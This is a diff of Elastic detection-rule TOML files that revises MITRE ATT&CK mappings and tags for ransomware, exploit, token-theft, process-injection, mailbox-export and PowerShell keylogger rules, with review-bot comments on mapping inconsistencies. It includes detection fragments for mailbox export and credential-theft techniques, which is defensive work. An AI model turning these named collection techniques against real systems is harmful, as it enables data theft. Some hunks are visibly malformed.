+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/promotions/endgame_ransomware_prevented.toml b/rules/promotions/endgame_ransomware_prevented.toml
index 28f96352a27..4e91b760d30 100644
--- a/rules/promotions/endgame_ransomware_prevented.toml
+++ b/rules/promotions/endgame_ransomware_prevented.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -69,3 +69,15 @@ Elastic Endgame is a security solution designed to prevent ransomware by monitor
 - Notify the IT security team and relevant stakeholders about the incident for awareness and further investigation into potential vulnerabilities exploited.
 - Document the incident details, including the response actions taken, to improve future incident response strategies and facilitate any necessary reporting or compliance requirements."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1486"
+name = "Data Encrypted for Impact"
+reference = "https://attack.mitre.org/techniques/T1486/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml
index c74ed775d20..377f3d62796 100644
--- a/rules/promotions/execution_endgame_exploit_detected.toml
+++ b/rules/promotions/execution_endgame_exploit_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,13 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = [
- "Data Source: Elastic Endgame",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,20 +72,12 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml
index 9882090ac4d..6e9ceb442ad 100644
--- a/rules/promotions/execution_endgame_exploit_prevented.toml
+++ b/rules/promotions/execution_endgame_exploit_prevented.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,20 +80,25 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1068"
 name = "Exploitation for Privilege Escalation"
 reference = "https://attack.mitre.org/techniques/T1068/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
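Review bot: `execution_endgame_exploit_detected.toml` drops its Privilege Escalation/T1068 block in this hunk (and the matching `Tactic: Privilege Escalation` tag in the `@@ -26` hunk on the previous line), while `execution_endgame_exploit_prevented.toml` in the following hunk keeps T1068 under Privilege Escalation and only adds T1203. The two rules promote the same Endgame alert family in detected/prevented form, so they would be expected to carry the same ATT&CK mapping; either restore the `[[rule.threat]]` Privilege Escalation block in the detected rule or remove it from the prevented one. If the asymmetry is deliberate, a sentence in the PR description explaining it would stop the next reviewer from raising this again.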
diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
index c828eafd159..d25aef0cd49 100644
--- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
+++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,14 +72,26 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1134"
+name = "Access Token Manipulation"
+reference = "https://attack.mitre.org/techniques/T1134/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
index 654389a20dd..ee8309c7d75 100644
--- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
+++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "medium"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,14 +72,26 @@ Elastic Endgame is a security solution that prevents unauthorized credential man
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1134"
+name = "Access Token Manipulation"
+reference = "https://attack.mitre.org/techniques/T1134/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
index da56645fb6b..cd8997f1f08 100644
--- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
+++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,14 +72,36 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
+[[rule.threat.technique.subtechnique]]
+id = "T1134.001"
+name = "Token Impersonation/Theft"
+reference = "https://attack.mitre.org/techniques/T1134/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1134"
+name = "Access Token Manipulation"
+reference = "https://attack.mitre.org/techniques/T1134/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1134.001"
+name = "Token Impersonation/Theft"
+reference = "https://attack.mitre.org/techniques/T1134/001/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
index 9b43b081eca..70363bba749 100644
--- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
+++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "medium"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,14 +72,36 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
+[[rule.threat.technique.subtechnique]]
+id = "T1134.001"
+name = "Token Impersonation/Theft"
+reference = "https://attack.mitre.org/techniques/T1134/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1134"
+name = "Access Token Manipulation"
+reference = "https://attack.mitre.org/techniques/T1134/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1134.001"
+name = "Token Impersonation/Theft"
+reference = "https://attack.mitre.org/techniques/T1134/001/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
index 38a36feec06..7de13ee97f7 100644
--- a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
+++ b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -73,14 +73,26 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1055"
+name = "Process Injection"
+reference = "https://attack.mitre.org/techniques/T1055/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
index 5a5e8b7765d..9c49b986608 100644
--- a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
+++ b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "medium"
-tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
+tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,14 +72,26 @@ Elastic Endgame is a security solution that prevents malicious activities like p
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1055"
+name = "Process Injection"
+reference = "https://attack.mitre.org/techniques/T1055/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/threat_intel/threat_intel_indicator_match_email.toml b/rules/threat_intel/threat_intel_indicator_match_email.toml
index e4fa4bfc04d..f17ba379307 100644
--- a/rules/threat_intel/threat_intel_indicator_match_email.toml
+++ b/rules/threat_intel/threat_intel_indicator_match_email.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2025/04/11"
 maturity = "production"
-updated_date = "2025/04/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,7 @@ or a [custom integration](https://www.elastic.co/guide/en/security/current/es-th
 More information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).
 """
 severity = "high"
-tags = ["Rule Type: Threat Match", "Resources: Investigation Guide"]
+tags = ["Rule Type: Threat Match", "Tactic: Initial Access", "Resources: Investigation Guide"]
 threat_index = ["filebeat-*", "logs-ti_*"]
 threat_indicator_path = "threat.indicator"
 threat_language = "kuery"
@@ -165,3 +165,16 @@ value = "threat.indicator.email.address"
 type = "mapping"
 field = "email.reply_to.address"
 value = "threat.indicator.email.address"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.techn
ique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml
index bdff598faa5..7f7f82b9bac 100644
--- a/rules/windows/collection_email_outlook_mailbox_via_com.toml
+++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -21,14 +21,7 @@ references = [
 risk_score = 47
 rule_id = "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
@@ -87,36 +80,36 @@ Outlook's integration with the Component Object Model (COM) allows processes to
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1114.001"
 name = "Local Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/001/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1559"
 name = "Inter-Process Communication"
 reference = "https://attack.mitre.org/techniques/T1559/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1559.001"
 name = "Component Object Model"
 reference = "https://attack.mitre.org/techniques/T1559/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml
index 97ba3fb44a3..fee81690d6d 100644
--- a/rules/windows/collection_email_powershell_exchange_mailbox.toml
+++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/15"
 integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -75,21 +75,7 @@ references = [
 risk_score = 47
 rule_id = "6aace640-e631-4870-ba8e-5fdda09325db"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Tactic: Execution",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Windows Security Event Logs",
- "Data Source: Crowdstrike",
- "Data Source: Sysmon",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -102,41 +88,18 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1114.002"
 name = "Remote Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/002/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml
index 90ae0bf3cf8..693f71e02fc 100644
--- a/rules/windows/collection_mailbox_export_winlog.toml
+++ b/rules/windows/collection_mailbox_export_winlog.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/11"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
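Review bot: This hunk removes the Execution/T1059.001 PowerShell block from `collection_email_powershell_exchange_mailbox.toml`, and the same removal appears later in the patch for `collection_posh_clipboard_capture.toml` and `collection_posh_mailbox.toml`, while `collection_posh_audio_capture.toml` and `collection_posh_keylogger.toml` keep T1059.001 under Execution and gain a `Tactic: Execution` tag instead. All of these are PowerShell-driven collection rules, so the way the tag/tactic mismatch was resolved differs across the family: in two rules the tag was added, in three the mapping was dropped. Pick one policy for whether PowerShell collection rules carry an Execution mapping and apply it uniformly; as it stands the mapping looks like an artifact of which direction each rule was fixed in. The tags hunks for the clipboard and posh mailbox rules are not in this part of the patch, so whether those rules ever carried the tag cannot be confirmed here.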
@@ -120,32 +120,21 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
-[[rule.threat.technique.subtechnique]]
-id = "T1114.001"
-name = "Local Email Collection"
-reference = "https://attack.mitre.org/techniques/T1114/001/"
 [[rule.threat.technique.subtechnique]]
 id = "T1114.002"
 name = "Remote Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/002/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml
index 3f922888c59..e40e8488f51 100644
--- a/rules/windows/collection_posh_audio_capture.toml
+++ b/rules/windows/collection_posh_audio_capture.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/19"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -96,14 +96,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Resources: Investigation Guide",
- "Data Source: PowerShell Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -129,39 +122,34 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1123"
 name = "Audio Capture"
 reference = "https://attack.mitre.org/techniques/T1123/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-[[rule.threat.technique]]
-id = "T1106"
-name = "Native API"
-reference = "https://attack.mitre.org/techniques/T1106/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml
index 149d213dfb5..f84dfe236b9 100644
--- a/rules/windows/collection_posh_clipboard_capture.toml
+++ b/rules/windows/collection_posh_clipboard_capture.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/12"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -153,34 +153,16 @@ case_insensitive = true
 value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1115"
 name = "Clipboard Data"
 reference = "https://attack.mitre.org/techniques/T1115/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml
index d99809a9e75..58297f5baa7 100644
--- a/rules/windows/collection_posh_keylogger.toml
+++ b/rules/windows/collection_posh_keylogger.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -104,14 +104,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Resources: Investigation Guide",
- "Data Source: PowerShell Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -135,44 +128,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique.subtechnique]] id = "T1056.001" name = "Keylogging" reference = "https://attack.mitre.org/techniques/T1056/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + +[[rule.threat.technique.subtechnique]] +id = "T1056.001" +name = "Keylogging" +reference = "https://attack.mitre.org/techniques/T1056/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - 